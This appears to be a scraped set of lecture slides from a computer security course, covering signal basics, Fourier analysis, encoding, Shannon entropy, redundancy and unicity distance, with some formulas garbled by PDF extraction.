![Page 164: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/164.jpg)
Summary of topics
We can do BIG arithmetic in these fields
We can do fast exponentiation and modulo arithmetic
We can check for primes
CS3235 - Hugh Anderson’s notes. Page number: 163
![Page 165: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/165.jpg)
Chapter 4
Lecture 4 - Preliminaries
CS3235 - Hugh Anderson’s notes. Page number: 164
![Page 166: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/166.jpg)
Chocolate fish people
Andreas Schuth
Chong Jun Yong
Ashley Ng *
Wu Yongzheng *
Zhang Huaixing *
Terence Sangeet
CS3235 - Hugh Anderson’s notes. Page number: 165
![Page 167: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/167.jpg)
The extended Euclidean algorithm
x ∗ a + y ∗ p = gcd(x, y)
Now - if p is a prime, then gcd(x, y) = 1, and so
x ∗ a + y ∗ p = 1
WRONG!
CS3235 - Hugh Anderson’s notes. Page number: 166
![Page 168: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/168.jpg)
The extended Euclidean algorithm
x ∗ a + y ∗ p = gcd(a, p)
Now - if p is a prime, then gcd(a, p) = 1, and so
x ∗ a + y ∗ p = 1
RIGHT!
CS3235 - Hugh Anderson’s notes. Page number: 167
![Page 169: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/169.jpg)
Last session
• Math preliminaries
– Fermat’s little theorem– Euler
CS3235 - Hugh Anderson’s notes. Page number: 168
![Page 170: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/170.jpg)
This session
• Physical preliminaries
• Entropy
CS3235 - Hugh Anderson’s notes. Page number: 169
![Page 171: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/171.jpg)
This session
• Physical preliminaries
• Entropy
CS3235 - Hugh Anderson’s notes. Page number: 170
![Page 172: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/172.jpg)
Preliminaries - physical
Consider:
• Is the data analog or digital?
• What limits are placed on it?
• How is it to be transmitted?
• How can you be sure that it is correct/accurate?
CS3235 - Hugh Anderson’s notes. Page number: 171
![Page 173: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/173.jpg)
Analog and digital
-1
0
1
2
3
4
5
-10 -8 -6 -4 -2 0 2 4 6 8 10
sin(x)+4(sin(x)>=0)+1
real(int(sin(x)*5))/10
The plot is amplitude versus time .
CS3235 - Hugh Anderson’s notes. Page number: 172
![Page 174: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/174.jpg)
Analog and digital
Repetition rate (if it repeats) is called the frequency , andis measured in Hertz
The peak to peak signal level is called the amplitude.
The simplest analog signal is called the sine wave.
By mixing we may create any desired periodic waveform.
CS3235 - Hugh Anderson’s notes. Page number: 173
![Page 175: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/175.jpg)
Analog and digital
-1
0
1
2
3
4
5
-10 -8 -6 -4 -2 0 2 4 6 8 10
sin(x)+4(sin(3*x)/3)+2
sin(x)+(sin(3*x)/3)
The plot is amplitude versus time . (Time domain)
CS3235 - Hugh Anderson’s notes. Page number: 174
![Page 176: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/176.jpg)
Analog and digital
0.20.333
1.0
f 3f 5f
The plot is amplitude vs frequency . (Frequency domain).
CS3235 - Hugh Anderson’s notes. Page number: 175
![Page 177: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/177.jpg)
Analog and digital
If we were to continue in the same progression, the resultantwaveform would be a square wave:
∞∑n=1
1n
sin(2πnf) (for odd n) ⇒ square wave, frequency f
This representation method is known as Fourier Analysisafter Jean-Baptiste Fourier.
CS3235 - Hugh Anderson’s notes. Page number: 176
![Page 178: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/178.jpg)
Fourier analysis
4
π(sin(2πft) +
1
3sin(6πft) +
1
5sin(10πft) +
1
7sin(14πft) + ...)
3
4
5
6
7
8
9
10
11
-10 -8 -6 -4 -2 0 2 4 6 8 10
sin(x)+10sin(x)+(sin(3*x)/3)+8
sin(x)+(sin(3*x)/3)+(sin(5*x)/5)+6sin(x)+(sin(3*x)/3)+(sin(5*x)/5)+(sin(7*x)/7)+4
CS3235 - Hugh Anderson’s notes. Page number: 177
![Page 179: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/179.jpg)
Fourier analysis
Transformation between equivalent time domain and fre-quency domain representations.
A piecewise continuously differentiable periodic func-tion in the time domain may be transformed to a dis-crete aperiodic function in the frequency domain.
smooth, repeating ↔ pointy, notrepeating
f(t) ↔ F (ω)
CS3235 - Hugh Anderson’s notes. Page number: 178
![Page 180: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/180.jpg)
Fourier analysis
Time domain Frequency domain Description
Continuous, periodic À Discrete, aperiodic Fourier series
Continuous, aperiodic À Continuous, aperiodic Fourier transform
Discrete, periodic À Discrete, periodic Discrete Fourier series
Discrete, aperiodic À Continuous, periodic Discrete Fourier transform
CS3235 - Hugh Anderson’s notes. Page number: 179
![Page 181: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/181.jpg)
Accuracy
Relationship between the bandwidth of a channel, and howaccurate a signal is.
Another way of stating this is to point out that the higherfrequency components are important - they are needed tore-create the original signal faithfully. If we had two 1,000Hzsignals, one a triangle, one a square wave - if they wereboth passed through the 1,000Hz bandwidth limited channelabove, they would look identical (a sine wave).
CS3235 - Hugh Anderson’s notes. Page number: 180
![Page 182: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/182.jpg)
Example transforms
f(t)
t
F( )ω
ω
CS3235 - Hugh Anderson’s notes. Page number: 181
![Page 183: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/183.jpg)
Example transforms
ω
ωF( )
f(t)
t
CS3235 - Hugh Anderson’s notes. Page number: 182
![Page 184: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/184.jpg)
Example transforms
t
ω
F( )ω
f(t)
CS3235 - Hugh Anderson’s notes. Page number: 183
![Page 185: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/185.jpg)
Example transforms
t
ω
F( )ω
f(t)
CS3235 - Hugh Anderson’s notes. Page number: 184
![Page 186: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/186.jpg)
Convolution
The Fourier transform of the convolution f(t) ? g(t) isthe product of the Fourier transforms of the functionsF (ω) and G(ω), and vice versa.
f(t) ? g(t) ↔ F (ω)×G(ω)
f(t)× g(t) ↔ F (ω) ? G(ω
We can use convolution to easily predict the functions thatresult from complex signal filtering or sampling.
CS3235 - Hugh Anderson’s notes. Page number: 185
![Page 187: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/187.jpg)
Convolution
g(t) G( )ω
F( ) * G( )f(t).g(t) ω
t ω
t ω
ω
f(t) F( )ω
ωt
CS3235 - Hugh Anderson’s notes. Page number: 186
![Page 188: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/188.jpg)
Modulation
A baseband signal is one in which the data is directly con-verted to a signal and transmitted. When the signal is im-posed on another signal, the process is called modulation.
We may modulate for several reasons:
• The media may not support the baseband signal
• We may wish to use a single transmission medium totransport many signals
CS3235 - Hugh Anderson’s notes. Page number: 187
![Page 189: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/189.jpg)
Modulation methods
• Frequency modulation - frequency shift keying (FSK)
• Amplitude modulation
• Phase modulation - phase shift keying (PSK)
• Combinations of the above (QAM)
CS3235 - Hugh Anderson’s notes. Page number: 188
![Page 190: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/190.jpg)
Baseband digital encoding
The simplest encoding scheme is just to use a low level fora zero bit, and a high level for a one bit. As long as bothends of a channel are synchronized in some manner, wecan transfer data.
On the other hand, if the ends of the channel are not syn-chronized we might use a simple encoding scheme, such asBipolar or Manchester encoding, to transfer synchronizing(clock) information on the same channel.
CS3235 - Hugh Anderson’s notes. Page number: 189
![Page 191: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/191.jpg)
Baseband digital encoding
Bipolar
BITS
TIME
CODE
CLOCK
RECVD
Manchester
BITS
TIME
CODE
CLOCK
RECVD
In Bipolar encoding, a 1 is transmitted with a positivepulse, a 0 with a negative pulse. Sometimes called re-turn to zero encoding.
In Manchester encoding, there is a transition in the cen-ter of each bit cell.
CS3235 - Hugh Anderson’s notes. Page number: 190
![Page 192: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/192.jpg)
Summary
Data commonly transferred digitally
Trade-off between bandwidth, accuracy of any signal
CS3235 - Hugh Anderson’s notes. Page number: 191
![Page 193: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/193.jpg)
Information theory
The term information is commonly understood. Considerthe following two sentences:
1. The sun will rise tomorrow.
2. The Fiji rugby team will win against the All Blacks (NewZealand rugby team) the next time they play.
Question: Which sentence contains the most information?
CS3235 - Hugh Anderson’s notes. Page number: 192
![Page 194: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/194.jpg)
Information theory
Temperature today is OK, Temperature today is OK, Tem-perature today is OK, Temperature today is OK, Temper-ature today is OK, Temperature today is OK, Tempera-ture today is OK, Temperature today is OK, Temperaturetoday is OK, Temperature today is OK, ...
... total information here is close to zero!
?
More information means less predictable
Less information means more predictable
CS3235 - Hugh Anderson’s notes. Page number: 193
![Page 195: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/195.jpg)
Information theory
Nyquist (1924) and Hartley (1928) laid the foundations:
Hartley showed that the information content is propor-tional to the logarithm of the number of possible mes-sages. Integers between 1 and n need log2 n bits.
Shannon developed a mathematical treatment of com-munication and information in an important paper at
http://cm.bell-labs.com/cm/ms/what/shannonday/paper.html
CS3235 - Hugh Anderson’s notes. Page number: 194
![Page 196: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/196.jpg)
Information theory model
ReceiverSourceInformation
TransmitterDestination
Channel
SourceNoise
(or sink)
The relevance of Shannon to secrecy is in another importantpaper at
http://www.cs.ucla.edu/˜jkong/research/security/shannon.html
CS3235 - Hugh Anderson’s notes. Page number: 195
![Page 197: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/197.jpg)
Entropy
In our communication model, the units of transmission arecalled messages, constructed from an alphabet of (say) nsymbols x ∈ x1, . . . , xn each with a probability of trans-mission Px.
We associate with each symbol x a quantity Hx which is ameasure of the information associated with that symbol.
Hx = Px log2
1Px
CS3235 - Hugh Anderson’s notes. Page number: 196
![Page 198: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/198.jpg)
Entropy
Hx = Px log2
1Px
If the probability of occurence of each symbol is the same,we can derive Hartley’s result, that the average amount ofinformation transmitted in a single symbol (the source en-tropy) is
H(X) = log2 n
where X is a label referring to each of the source symbolsx1, . . . , xn.
CS3235 - Hugh Anderson’s notes. Page number: 197
![Page 199: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/199.jpg)
Entropy units
Our units for entropy can be bits/second or bits/symbol , andwe also sometimes use unit-less relative entropy measures(relative to the entropy of the system if all symbols wereequally likely).
CS3235 - Hugh Anderson’s notes. Page number: 198
![Page 200: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/200.jpg)
Entropy - same probability
Symbols Entropy of each symbol Bits needed2 Hx = 1
2log22 = 12 2 ∗ 1
2 = 14 Hx = 1
4log24 = 12 4 ∗ 1
2 = 28 Hx = 1
8log28 = 38 8 ∗ 3
8 = 316 Hx = 1
16log216 = 416 16 ∗ 4
16 = 421 Hx = 1
21log221 = 4.3921 21 ∗ 4.39
21 = 4.39
CS3235 - Hugh Anderson’s notes. Page number: 199
![Page 201: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/201.jpg)
Entropy - different probability
However, if the probability of occurence of each symbol isnot the same, we derive the following result, that the sourceentropy is
H(X) =n∑
i=1
Pxilog2
1Pxi
Shannon’s paper shows that H determines the channel ca-pacity required to transmit the desired information with themost efficient coding scheme.
CS3235 - Hugh Anderson’s notes. Page number: 200
![Page 202: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/202.jpg)
Entropy - different probability
If we had a source emitting two symbols, 0 and 1, with prob-abilities of 1 and 0, then the entropy of the source is
H(X) =n∑
i=1
Pxilog2
1Pxi
= log2 1 + 0 ∗ log2 0
= 0 bits/symbol
CS3235 - Hugh Anderson’s notes. Page number: 201
![Page 203: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/203.jpg)
Entropy - different probability
If we were transmitting a sequence of letters A,B,C,D,E andF with probabilities 1
2,14, 116, 1
16, 116 and 1
16, the entropy for thesystem is
H(X) =12
log2 2 +14
log2 4 +416
log2 16
= 0.5 + 0.5 + 1.0
= 2 bits/symbol
CS3235 - Hugh Anderson’s notes. Page number: 202
![Page 204: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/204.jpg)
Encoding the letters
A fixed size 3-bit code, and then a more complex code:
Symbol 3-bit code Complex code
A 000 0
B 001 10
C 010 1100
D 011 1101
E 100 1110
F 101 1111
CS3235 - Hugh Anderson’s notes. Page number: 203
![Page 205: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/205.jpg)
Analysis of encoding
The average length of the binary digits needed to encode atypical sequence of symbols using the 3-bit code is
L(X) =
nXi=1
Pxi • sizeof(xi)
=1
2∗ 3 +
1
4∗ 3 +
4
16∗ 3
= 1.5 + 0.75 + 0.75
= 3 bits/symbol
CS3235 - Hugh Anderson’s notes. Page number: 204
![Page 206: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/206.jpg)
Analysis of encoding
The average length of the binary digits needed to encode atypical sequence of symbols using the complex encoding is
L(X) =
nXi=1
Pxi • sizeof(xi)
=1
2∗ 1 +
1
4∗ 2 +
4
16∗ 4
= 0.5 + 0.5 + 1.0
= 2 bits/symbol
i.e. it is more efficient, averaging only 2 bits for each symboltransmitted.
CS3235 - Hugh Anderson’s notes. Page number: 205
![Page 207: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/207.jpg)
Entropy and transmission rate
If our source was transmitting 0 and 1 bits with equal proba-bility, but the received data was corrupted 50% of the time,we might reason that our rate r(X) of information transmis-sion was 0.5, because half of our data is getting throughcorrectly.
ReceiverSourceInformation
TransmitterDestination
Channel
SourceNoise
(or sink)
CS3235 - Hugh Anderson’s notes. Page number: 206
![Page 208: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/208.jpg)
Entropy and transmission rate
However, a better argument is to consider the difference be-tween the entropy of the source and the conditional entropyof the received data:
r(X) = H(X)−H(X | y)
where H(X | y) is the conditional entropy of the receiveddata.
CS3235 - Hugh Anderson’s notes. Page number: 207
![Page 209: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/209.jpg)
Entropy and transmission rate
H(X | y) = 0.5 ∗ log2 2 + 0.5 ∗ log2 2
= 1
and H(X) = 1 (shown before)
so r(X) = H(X)−H(X | y)
= 0 bits/symbol
This is a much better measure of the amount of informationtransmitted.
CS3235 - Hugh Anderson’s notes. Page number: 208
![Page 210: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/210.jpg)
Redundancy
The ratio of the entropy of a source H(X) to what it wouldbe if the symbols had equal probabilities H ′(X), is calledthe relative entropy. We use the notation Hr(X), and
Hr(X) =H(X)
H ′(X)
The redundancy of the source is 1−Hr(X)
R(X) = 1−Hr(X)
CS3235 - Hugh Anderson’s notes. Page number: 209
![Page 211: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/211.jpg)
Redundancy
If we look at English text a symbol at a time1, the redun-dancy is about 0.7.
This indicates that it should be simple to compress En-glish text by about 70%.
This sort of redundancy is a unitless relative redundancy
1That is, without considering letter sequences.
CS3235 - Hugh Anderson’s notes. Page number: 210
![Page 212: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/212.jpg)
Unicity distance
Defined by Shannon - an approximation to the amount ofciphertext such that the the sum of the source entropy andthe encryption key entropy is the same as the number ofciphertext bits used.
Ciphertexts longer have only one meaningful decryption
Ciphertexts shorter may have more than one meaningfuldecryption (and hence be stronger, as a hacker will notknow which one is correct)
CS3235 - Hugh Anderson’s notes. Page number: 211
![Page 213: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/213.jpg)
Unicity distance
The longer the unicity distance, the better the cryptosys-tem
Unicity distance U is the entropy of the key divided bythe redundancy of the source, and is approximately
U ≈ log2K
R log2P
(K is the key size, R is the redundancy, P is the number ofsymbols).
CS3235 - Hugh Anderson’s notes. Page number: 212
![Page 214: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/214.jpg)
Unicity distance
26 letter alphabet, and 26! keys
U ≈ log226!0.5 log226
≈ 880.7 ∗ 4.7
≈ 27
So given a ciphertext of 27 symbols, a unique decoding ispossible.
CS3235 - Hugh Anderson’s notes. Page number: 213
![Page 215: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/215.jpg)
Unicity distance
In general
Longer key length then longer unicity distance
Redundancy inversely proportional to unicity distance
Estimates the minimum amount of ciphertext for whichthere is only a single plaintext solution on doing a bruteforce attack...
CS3235 - Hugh Anderson’s notes. Page number: 214
![Page 216: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/216.jpg)
Chapter 5
Lecture 5 - Preliminaries
CS3235 - Hugh Anderson’s notes. Page number: 215
![Page 217: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/217.jpg)
Last session
• Physical preliminaries
• Entropy
CS3235 - Hugh Anderson’s notes. Page number: 216
![Page 218: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/218.jpg)
This session
